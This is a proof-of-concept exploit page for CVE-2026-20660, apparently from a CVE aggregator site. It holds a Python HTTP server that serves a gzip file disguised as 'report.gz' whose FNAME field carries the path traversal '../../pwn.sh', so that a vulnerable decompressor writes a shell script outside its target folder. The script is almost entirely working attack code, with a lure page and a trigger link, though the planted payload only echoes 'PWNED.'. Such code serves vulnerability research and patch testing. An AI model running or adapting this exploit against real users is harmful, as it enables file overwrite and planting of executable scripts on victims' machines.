5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-20660
README.md
Rendering markdown...
POC / server_overwrite.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
"""
CVE-2026-20660 PoC variant: write ../../pwn.sh via gzip FNAME.
"""

import argparse
import http.server
import sys
from datetime import datetime

from server import make_gzip_with_fname

PAYLOAD = b'#!/bin/sh\n\necho "PWNED."\n'
FNAME = "../../pwn.sh"

LANDING = b"""\
<!DOCTYPE html>
<html><head><title>Overwrite PoC</title>
<style>
body{font-family:monospace;background:#111;color:#eee;padding:40px}
a.btn{display:inline-block;padding:14px 28px;background:#f00;color:#fff;
text-decoration:none;border-radius:6px;font-size:18px;margin:16px 0}
</style>
</head><body>
<h1>CVE-2026-20660 - overwrite ~/pwn.sh</h1>
<pre>FNAME: ../../pwn.sh
Payload: #!/bin/sh; echo "PWNED."</pre>
<a class="btn" href="/download">Trigger</a>
</body></html>
"""


class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(LANDING)))
            self.end_headers()
            self.wfile.write(LANDING)
            return

        if self.path.startswith("/download"):
            gz_data = make_gzip_with_fname(PAYLOAD, FNAME)
            print(f"\nTRIGGERED: FNAME={FNAME}, size={len(gz_data)}, client={self.client_address[0]}")

            self.send_response(200)
            self.send_header("Content-Type", "application/gzip")
            self.send_header("Content-Disposition", 'attachment; filename="report.gz"')
            self.send_header("Content-Length", str(len(gz_data)))
            self.send_header("Cache-Control", "no-store")
            self.end_headers()
            self.wfile.write(gz_data)
            return

        self.send_error(404)

    def log_message(self, fmt, *args):
        sys.stderr.write(f"[{datetime.now():%H:%M:%S}] {fmt % args}\n")


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--port", "-p", type=int, default=9999)
    parser.add_argument("--bind", "-b", default="0.0.0.0")
    args = parser.parse_args()

    server = http.server.HTTPServer((args.bind, args.port), Handler)
    print(f"\nOverwrite PoC on http://{args.bind}:{args.port}/")
    print(f"FNAME: {FNAME}")
    print("Target: ~/pwn.sh")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.server_close()


if __name__ == "__main__":
    main()